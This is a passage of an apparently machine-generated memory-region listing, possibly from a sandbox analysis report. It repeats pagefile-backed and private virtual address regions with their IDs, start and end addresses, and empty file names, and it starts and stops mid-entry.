"pagefile_0x00000000002a0000" filename = "" Region: id = 10823 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10824 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10825 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10826 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10827 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10828 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10829 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10968 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10969 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10970 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10971 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10972 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10973 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10974 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10975 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10976 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10977 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10979 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10980 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10982 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10983 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10984 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10985 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10986 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10987 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10988 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10989 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10990 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10991 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10992 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10993 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10994 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10995 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10996 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10997 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10998 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10999 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11000 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11001 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11002 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11003 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11004 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11005 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11006 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11007 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11008 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11009 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11010 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11011 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11012 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11013 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11014 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11015 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11016 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11017 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11023 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11024 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11025 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11026 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11027 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11028 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11029 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11030 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11031 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11032 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11033 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11034 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11035 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11036 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11037 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11038 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11039 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11040 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11041 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11042 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11043 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11044 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11045 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11046 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11047 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11048 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11049 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11050 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11051 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11052 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11053 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11054 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11055 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11056 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11057 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11058 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11059 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11060 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11061 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11062 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11063 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11064 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11065 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11066 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11067 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11068 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11069 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11070 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11071 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11072 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11103 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11104 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11105 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11106 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11107 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11108 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11229 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11230 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11231 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11232 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11233 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11234 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11235 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11236 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11237 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11238 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11239 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11240 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11241 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11242 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11243 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11244 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11245 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11246 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11247 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11248 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11249 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11250 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11251 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11252 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11253 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11254 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11255 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11256 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11257 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11258 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11259 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11260 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11261 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11262 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11298 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11299 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11300 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11301 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11302 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11303 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11304 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11305 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11306 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11307 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11308 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11309 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11310 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11311 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11312 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11313 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11314 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11315 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11316 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11317 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 11318 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 11319 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11320 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11321 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11322 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11323 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11324 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11325 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11326 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11327 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11328 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11329 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11330 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11331 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11332 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11333 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11334 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11335 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11336 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11337 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11338 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11339 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11340 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11341 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11342 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11343 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11344 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11345 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 11346 start_va = 